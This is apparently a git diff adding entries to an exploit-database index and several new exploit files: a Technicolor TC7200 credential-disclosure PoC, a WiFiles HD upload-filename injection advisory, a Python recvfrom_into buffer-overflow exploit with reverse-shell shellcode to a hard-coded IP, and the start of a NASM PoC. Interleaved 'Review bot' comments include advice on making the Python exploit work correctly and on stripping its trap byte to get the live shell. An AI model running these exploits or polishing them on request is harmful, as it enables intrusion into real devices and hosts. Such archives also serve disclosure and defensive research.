diff --git a/files.csv b/files.csv
index 45a41f23a..7eeafc5cf 100755
--- a/files.csv
+++ b/files.csv
@@ -10037,7 +10037,7 @@ id,file,description,date,author,platform,type,port
 10837,platforms/php/webapps/10837.txt,"Quick Poll (code.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
 10838,platforms/php/webapps/10838.txt,"list Web (addlink.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
 10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip (store_info.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
-10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 - Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0
+10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 (.asx) - Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0
 10841,platforms/php/webapps/10841.pl,"pL-PHP <= beta 0.9 - Local File Include Exploit",2009-12-31,"cr4wl3r ",php,webapps,0
 10842,platforms/windows/dos/10842.py,"SimplePlayer 0.2 - (.wav) overflow DoS Exploit (0day)",2009-12-31,mr_me,windows,dos,0
 10844,platforms/php/webapps/10844.txt,"Joomla Component com_portfol SQL Injection Vulnerability",2009-12-31,"wlhaan hacker",php,webapps,0
@@ -10871,7 +10871,7 @@ id,file,description,date,author,platform,type,port
 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0
 11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 multi file include",2010-03-27,ITSecTeam,php,webapps,0
 11904,platforms/php/webapps/11904.txt,"68kb multi remote file include",2010-03-27,ITSecTeam,php,webapps,0
-11905,platforms/php/webapps/11905.txt,"Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0
+11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0
 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities.",2010-03-27,"cp77fk4r ",php,webapps,0
 11908,platforms/php/webapps/11908.txt,"Joomla Component com_solution SQL Injection Vulnerability",2010-03-27,"DevilZ TM",php,webapps,0
 11909,platforms/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 - Local stack overflow exploit",2010-03-28,"Hazem mofeed",windows,local,0
@@ -11629,7 +11629,7 @@ id,file,description,date,author,platform,type,port
 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0
 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent (idproperty) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0
 12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit",2010-05-28,Dr_IDE,windows,dos,0
-12775,platforms/multiple/dos/12775.py,"VLC Media Player <= 1.0.6 - Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0
+12775,platforms/multiple/dos/12775.py,"VLC Media Player <= 1.0.6 (.avi) - Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0
 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability",2010-05-28,CoBRa_21,php,webapps,0
 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent (news.php) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0
 12779,platforms/php/webapps/12779.txt,"Joomla Component My Car Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
@@ -16203,7 +16203,7 @@ id,file,description,date,author,platform,type,port
 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 Memory Corruption",2012-04-19,shinnai,multiple,dos,0
 18755,platforms/windows/dos/18755.c,"MS11-046 Afd.sys Proof of Concept",2012-04-19,fb1h2s,windows,dos,0
 18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption Vulnerability",2012-04-19,"Tavis Ormandy",multiple,dos,0
-18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 division by zero vulnerability",2012-04-19,"Senator of Pirates",windows,dos,0
+18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 (.mp4) - Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0
 18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0
 18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 ST WRQ Buffer Overflow",2012-04-20,metasploit,windows,remote,0
 18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0
@@ -19137,7 +19137,7 @@ id,file,description,date,author,platform,type,port
 21886,platforms/php/webapps/21886.txt,"Py-Membres 3.1 Index.PHP Unauthorized Access Vulnerability",2002-10-02,frog,php,webapps,0
 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0
 21888,platforms/windows/remote/21888.rb,"KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",2012-10-11,metasploit,windows,remote,0
-21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0
+21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 (.png) - ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0
 21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0
 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0
 21892,platforms/windows/local/21892.txt,"FileBound 6.2 Privilege Escalation Vulnerability",2012-10-11,"Nathaniel Carew",windows,local,0
@@ -20413,7 +20413,7 @@ id,file,description,date,author,platform,type,port
 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
 23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0
 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow Vulnerability",2003-09-30,"Luigi Auriemma",linux,dos,0
-23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 Crash PoC",2012-12-07,coolkaveh,windows,dos,0
+23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 (.swf) - Crash PoC",2012-12-07,coolkaveh,windows,dos,0
 23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 Multiple CSRF Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0
 23203,platforms/windows/remote/23203.rb,"IBM System Director Agent DLL Injection",2012-12-07,metasploit,windows,remote,0
 23204,platforms/linux/local/23204.c,"Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun Vulnerability",2003-09-30,demz,linux,local,0
@@ -28663,6 +28663,7 @@ id,file,description,date,author,platform,type,port
 31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
 31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 PNM File Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0
 31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0
+31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,@sha0coder,linux,remote,0
 31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0
 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
@@ -28681,3 +28682,16 @@ id,file,description,date,author,platform,type,port
 31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0
 31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0
 31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0
+31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80
+31896,platforms/hardware/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,hardware,webapps,8080
+31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection Vulnerability",2014-02-25,Hurley,php,webapps,80
+31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 'name' Parameter Cross Site Scripting Vulnerability",2008-06-10,"Eduardo Neves",multiple,remote,0
+31902,platforms/php/webapps/31902.txt,"Noticia Portal 'detalle_noticia.php' SQL Injection Vulnerability",2008-06-10,t@nzo0n,php,webapps,0
+31903,platforms/linux/remote/31903.asm,"NASM 2.0 'ppscan()' Off-By-One Buffer Overflow Vulnerability",2008-06-21,"Philipp Thomas",linux,remote,0
+31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0
+31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 admin/login.php username Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0
+31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 last_records.php annuaire Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0
+31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 annuaire.php Multiple Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0
+31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0
+31909,platforms/windows/remote/31909.html,"XChat 2.8.7b 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0
+31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0
diff --git a/platforms/hardware/webapps/31894.txt b/platforms/hardware/webapps/31894.txt
new file mode 100755
index 000000000..52feacbaf
--- /dev/null
+++ b/platforms/hardware/webapps/31894.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Technicolor TC7200: Authentication Bypass
+# Google Dork: N/A
+# Date: 24-02-2014
+# Exploit Author: Jeroen - IT Nerdbox
+# Vendor Homepage: http://www.technicolor.com/
+# Software Link: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300
+# Version: STD6.01.12
+# Tested on: N/A
+# CVE : CVE-2014-1677
+#
+
+## Description:
+#
+# Any user on the internal network can download a backup configuration file without authenticating first. The backup file contains
+# the credentials to the administrative web interface.
+#
+## PoC:
+#
+# Download the file: http://192.168.0.1/goform/system/GatewaySettings.bin
+#
+# Using the command: $ hexedit -C GatewaySettings.bin
+#
+# 00006590 00 00 00 00 00 00 00 00 30 4d 4c 6f 67 00 06 00 |........0MLog...|
+# 000065a0 05 61 64 6d 69 6e 00 15 6d 79 73 75 70 65 72 73 |.admin..mysupers|
+# 000065b0 65 63 72 65 74 70 61 73 73 77 6f 72 64 00 06 75 |ecretpassword..u|
+# 000065c0 70 63 63 73 72 00 00 |pccsr..|
+# 000065c7
+#
+#
+
+# More information can be found at:http://www.nerdbox.it/technicolor-tc7200-auth-bypass-dos/
diff --git a/platforms/hardware/webapps/31896.txt b/platforms/hardware/webapps/31896.txt
new file mode 100755
index 000000000..5f51fdf88
--- /dev/null
+++ b/platforms/hardware/webapps/31896.txt
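Review bot: The header line `# Exploit Title: Technicolor TC7200: Authentication Bypass` disagrees with the files.csv entry ("Credentials Disclosure") and with the PoC itself, which is an unauthenticated GET of `/goform/system/GatewaySettings.bin` that yields the admin password in cleartext; I would align the title, e.g. `# Exploit Title: Technicolor TC7200 - Unauthenticated Configuration Backup Download / Credentials Disclosure`. `# Tested on: N/A` sits next to `# Version: STD6.01.12` and a hex dump of real output, so the firmware the dump was taken from should be stated. The dump also shows the web-UI password stored unencrypted inside the backup, which is a second finding worth one sentence (the exposure is the missing auth check plus cleartext storage, so rotating the password after a firmware fix is still needed). `192.168.0.1` is presumably the factory-default LAN address — say so, since the path must be requested against the actual gateway address. There is no mitigation line at all; at minimum `# Mitigation: restrict LAN access to the web UI and check with the ISP/vendor for updated firmware` would help readers.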
@@ -0,0 +1,186 @@
+Document Title:
+===============
+WiFiles HD v1.3 iOS - File Include Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1214
+
+
+Release Date:
+=============
+2014-02-22
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1214
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Product & Service Introduction:
+===============================
+WiFiles HD for iPad is an easy to use file storage/sharing app. Transfer files using wifi or iTunes File Transfer to & from your Mac/PC with ease.
+Updated- transfer files in background now supported. Store movies, photos, music, and any other file you wish. In app filesharing supports opening
+files in supporting third party apps.
+
+( Copy of the Homepage: https://itunes.apple.com/us/app/wifiles-hd/id436227200 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official Mr Burns - WiFiles HD v1.4 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-02-22: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Apple AppStore
+Product: WiFiles HD - iOS Web Server & Web Application 1.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include vulnerability has been discovered in the official WiFiles HD v1.4 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests
+or system specific path commands to compromise the web-application/device.
+
+The vulnerability is located in the upload module of the mobile web-application interface. Remote attackers can
+manipulate the `upload > submit` POST method request with the vulnerable `filename` value to compromise the application
+or connected device components.
+
+The issue allows remote attackers to include local app path values or wifi web-server files. The exploitation appears
+on the application-side and the inject request method is POST. The exection occurs in the main index file dir list.
+The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability
+scoring system) count of 7.0(+)|(-)7.1.
+
+Exploitation of the local file include vulnerability requires no user interaction or privileged mobile application user account.
+Successful exploitation of the file include web vulnerability results in mobile application compromise, connected device compromise
+or web-server compromise.
+
+Request Method(s):
+ [+] POST
+
+Vulnerable Module(s):
+ [+] Upload
+
+Vulnerable Procedure(s):
+ [+] Submit
+
+Vulnerable Parameter(s):
+ [+] filename
+
+Affected Module(s):
+ [+] File Dir Index Listing (http://localhost:8080)
+
+
+Proof of Concept (PoC):
+=======================
+The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
+For security demonstration or to reproduce the file include web vulnerability follow the provided information and steps below to continue.
+
+PoC: Exploit - filename
+
+Files from WiFiles HD

WiFiles HD:

+Please do not leave this page until transfers are complete. +Refresh the page before attempting to transfer files if you close the server in WiFiles HD. +

137.png +( 279.0 Kb, 2014-02-22 14:04:01 +0000)
+e4c167621c2e61.jpg +( 23.8 Kb, 2014-02-22 14:04:10 +0000)
+<./<[LOCAL FILE INCLUDE VULNERABILITY!]>"> +( 23.8 Kb, 2014-02-22 14:09:20 +0000)
+

+

+
+
+--- PoC Session Logs [POST] ---
+
+04:02:59.326[191ms][total 1633ms] Status: 200[OK]
+POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1056] Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:8080]
+ User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
+ Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://localhost:8080/]
+ Connection[keep-alive]
+ POST-Daten:
+ POST_DATA[-----------------------------213382078724824
+Content-Disposition: form-data; name="file"; filename="./<[LOCAL FILE INCLUDE VULNERABILITY!]>"
+Content-Type: image/jpeg
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure encode, parse and restriction of the vulnerable filename value in the upload POST method request.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
+or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+ Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+--
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/linux/remote/31875.py b/platforms/linux/remote/31875.py
new file mode 100755
index 000000000..b27638b16
--- /dev/null
+++ b/platforms/linux/remote/31875.py
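Review bot: The class the advisory asserts throughout ("local file include") is not what the PoC shows: the session log only demonstrates that the multipart `filename` value `./<[LOCAL FILE INCLUDE VULNERABILITY!]>` is accepted by the upload handler and rendered verbatim into the directory listing at `http://localhost:8080/`, which looks like an unsanitized filename reflected into HTML (stored markup injection, and possibly path handling via the `./` prefix) — no local file is read or included anywhere in the log, so the severity (CVSS 7.1, "web-server compromise") is not supported by the evidence as written. I would add one sentence to Technical Details stating exactly what was observed and hedge the rest. The version is also inconsistent — the title and Affected Product(s) say 1.3 while the Abstract and Technical Details say v1.4. The fix section is too vague to act on; a concrete replacement would be `Reject filenames containing path separators or "..", store uploads under a server-generated name, and HTML-encode file names when rendering the index listing.`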
@@ -0,0 +1,94 @@
+#!/usr/bin/env python
+
+'''
+# Exploit Title: python socket.recvfrom_into() remote buffer overflow
+# Date: 21/02/2014
+# Exploit Author: @sha0coder
+# Vendor Homepage: python.org
+# Version: python2.7 and python3
+# Tested on: linux 32bit + python2.7
+# CVE : CVE-2014-1912
+
+
+
+socket.recvfrom_into() remote buffer overflow Proof of concept
+by @sha0coder
+
+TODO: rop to evade stack nx
+
+
+(gdb) x/i $eip
+=> 0x817bb28: mov eax,DWORD PTR [ebx+0x4] <--- ebx full control => eax full conrol
+ 0x817bb2b: test BYTE PTR [eax+0x55],0x40
+ 0x817bb2f: jne 0x817bb38 -->
+ ...
+ 0x817bb38: mov eax,DWORD PTR [eax+0xa4] <--- eax full control again
+ 0x817bb3e: test eax,eax
+ 0x817bb40: jne 0x817bb58 -->
+ ...
+ 0x817bb58: mov DWORD PTR [esp],ebx
+ 0x817bb5b: call eax <--------------------- indirect fucktion call ;)
+
+
+$ ./pyrecvfrominto.py
+ egg file generated
+
+$ cat egg | nc -l 8080 -vv
+
+... when client connects ... or wen we send the evil buffer to the server ...
+
+0x0838591c in ?? ()
+1: x/5i $eip
+=> 0x838591c: int3 <--------- LANDED!!!!!
+ 0x838591d: xor eax,eax + 0x838591f: xor ebx,ebx + 0x8385921: xor ecx,ecx + 0x8385923: xor edx,edx + +''' + +import struct + +def off(o): + return struct.pack('L',o) + + +reverseIP = '\xc0\xa8\x04\x34' #'\xc0\xa8\x01\x0a' +reversePort = '\x7a\x69' + + +#shellcode from exploit-db.com, (remove the sigtrap) +shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\ + "\xb0\x66\xb3\x01\x51\x6a\x06\x6a"\ + "\x01\x6a\x02\x89\xe1\xcd\x80\x89"\ + "\xc6\xb0\x66\x31\xdb\xb3\x02\x68"+\ + reverseIP+"\x66\x68"+reversePort+"\x66\x53\xfe"\ + "\xc3\x89\xe1\x6a\x10\x51\x56\x89"\ + "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"\ + "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"\ + "\xc0\x52\x68\x6e\x2f\x73\x68\x68"\ + "\x2f\x2f\x62\x69\x89\xe3\x52\x53"\ + "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"\ + "\x80" + + +shellcode_sz = len(shellcode) + +print 'shellcode sz %d' % shellcode_sz + + +ebx = 0x08385908 +sc_off = 0x08385908+20 + +padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM' + +''' + +------------+----------------------+ +--------------------+ + | | | | | + V | | V | +''' +buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off) # .. and landed ;) + + +print 'buff sz: %s' % len(buff) +open('egg','w').write(buff) diff --git a/platforms/linux/remote/31903.asm b/platforms/linux/remote/31903.asm new file mode 100755 index 000000000..a2155bf0c --- /dev/null +++ b/platforms/linux/remote/31903.asm 
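Review bot: `off()` packs pointers with `struct.pack('L', o)`, which in native mode uses the platform's `unsigned long` — 8 bytes on a 64-bit Python build — so an egg generated anywhere other than the 32-bit host named in the header has 8-byte pointer slots and the `ebx`/`sc_off` values no longer sit where the layout diagram expects; use `return struct.pack('<I', o)` for an explicit 4-byte little-endian value. The shellcode still starts with `\xcc` even though the comment says "(remove the sigtrap)", so as committed the target only traps (the gdb trace shows that is the intended landing, but a reader wanting the reverse shell must drop the first byte) — a comment such as `# leading \xcc is an int3 marker; strip it for the real payload` above `shellcode =` would avoid confusion. `open('egg','w')` should be `open('egg','wb')` since the buffer is binary. Note also that the script itself is Python 2 only (`print` statements), so the header's "python2.7 and python3" must be read as the vulnerable interpreter versions, not the versions the PoC runs under, and the hard-coded `ebx`/`sc_off` addresses are build-specific and presumably need re-deriving per target.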
@@ -0,0 +1,1589 @@ +source: http://www.securityfocus.com/bid/29656/info + +NASM is prone to an off-by-one buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. + +Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. + +NASM 2.02 and prior versions are vulnerable. + +; -*- fundamental -*- (asm-mode sucks) +; **************************************************************************** +; +; ldlinux.asm +; +; A program to boot Linux kernels off an MS-DOS formatted floppy disk. This +; functionality is good to have for installation floppies, where it may +; be hard to find a functional Linux system to run LILO off. +; +; This program allows manipulation of the disk to take place entirely +; from MS-LOSS, and can be especially useful in conjunction with the +; umsdos filesystem. +; +; Copyright (C) 1994-2005 H. Peter Anvin +; +; This program is free software; you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, Inc., 53 Temple Place Ste 330, +; Boston MA 02111-1307, USA; either version 2 of the License, or +; (at your option) any later version; incorporated herein by reference. +; +; **************************************************************************** + +%ifndef IS_MDSLINUX +%define IS_SYSLINUX 1 +%endif + +%define WITH_GFX 1 + +%include "head.inc" + +; +; Some semi-configurable constants... change on your own risk. +; +my_id equ syslinux_id +FILENAME_MAX_LG2 equ 4 ; log2(Max filename size Including final null) +FILENAME_MAX equ 11 ; Max mangled filename size +NULLFILE equ ' ' ; First char space == null filename +NULLOFFSET equ 0 ; Position in which to look +retry_count equ 16 ; How patient are we with the disk? 
+%assign HIGHMEM_SLOP 0 ; Avoid this much memory near the top +LDLINUX_MAGIC equ 0x3eb202fe ; A random number to identify ourselves with + +MAX_OPEN_LG2 equ 6 ; log2(Max number of open files) +MAX_OPEN equ (1 << MAX_OPEN_LG2) + +SECTOR_SHIFT equ 9 +SECTOR_SIZE equ (1 << SECTOR_SHIFT) + +; +; This is what we need to do when idle +; +%macro RESET_IDLE 0 + ; Nothing +%endmacro +%macro DO_IDLE 0 + ; Nothing +%endmacro + +; +; The following structure is used for "virtual kernels"; i.e. LILO-style +; option labels. The options we permit here are `kernel' and `append +; Since there is no room in the bottom 64K for all of these, we +; stick them at vk_seg:0000 and copy them down before we need them. +; + struc vkernel +vk_vname: resb FILENAME_MAX ; Virtual name **MUST BE FIRST!** +vk_rname: resb FILENAME_MAX ; Real name +vk_appendlen: resw 1 + alignb 4 +vk_append: resb max_cmd_len+1 ; Command line + alignb 4 +vk_end: equ $ ; Should be <= vk_size + endstruc + +; +; Segment assignments in the bottom 640K +; Stick to the low 512K in case we're using something like M-systems flash +; which load a driver into low RAM (evil!!) +; +; 0000h - main code/data segment (and BIOS segment) +; +real_mode_seg equ 4000h +cache_seg equ 3000h ; 64K area for metadata cache +vk_seg equ 2000h ; Virtual kernels +xfer_buf_seg equ 1000h ; Bounce buffer for I/O to high mem +comboot_seg equ real_mode_seg ; COMBOOT image loading zone +first_free_seg equ 5000h ; end of syslinux used memory + +; +; File structure. This holds the information for each currently open file. 
+; + struc open_file_t +file_sector resd 1 ; Sector pointer (0 = structure free) +file_left resd 1 ; Number of sectors left + endstruc + +%ifndef DEPEND +%if (open_file_t_size & (open_file_t_size-1)) +%error "open_file_t is not a power of 2" +%endif +%endif + +; --------------------------------------------------------------------------- +; BEGIN CODE +; --------------------------------------------------------------------------- + +; +; Memory below this point is reserved for the BIOS and the MBR +; + section .earlybss +trackbufsize equ 8192 +trackbuf resb trackbufsize ; Track buffer goes here +getcbuf resb trackbufsize + ; ends at 4800h + + section .bss + alignb 8 + + ; Expanded superblock +SuperInfo equ $ + resq 16 ; The first 16 bytes expanded 8 times +FAT resd 1 ; Location of (first) FAT +RootDirArea resd 1 ; Location of root directory area +RootDir resd 1 ; Location of root directory proper +DataArea resd 1 ; Location of data area +RootDirSize resd 1 ; Root dir size in sectors +TotalSectors resd 1 ; Total number of sectors +EndSector resd 1 ; Location of filesystem end +ClustSize resd 1 ; Bytes/cluster +ClustMask resd 1 ; Sectors/cluster - 1 +CopySuper resb 1 ; Distinguish .bs versus .bss +DriveNumber resb 1 ; BIOS drive number +ClustShift resb 1 ; Shift count for sectors/cluster +ClustByteShift resb 1 ; Shift count for bytes/cluster + + alignb open_file_t_size +Files resb MAX_OPEN*open_file_t_size + +; +; Constants for the xfer_buf_seg +; +; The xfer_buf_seg is also used to store message file buffers. We +; need two trackbuffers (text and graphics), plus a work buffer +; for the graphics decompressor. +; +xbs_textbuf equ 0 ; Also hard-coded, do not change +xbs_vgabuf equ trackbufsize +xbs_vgatmpbuf equ 2*trackbufsize + + + section .text +; +; Some of the things that have to be saved very early are saved +; "close" to the initial stack pointer offset, in order to +; reduce the code size... 
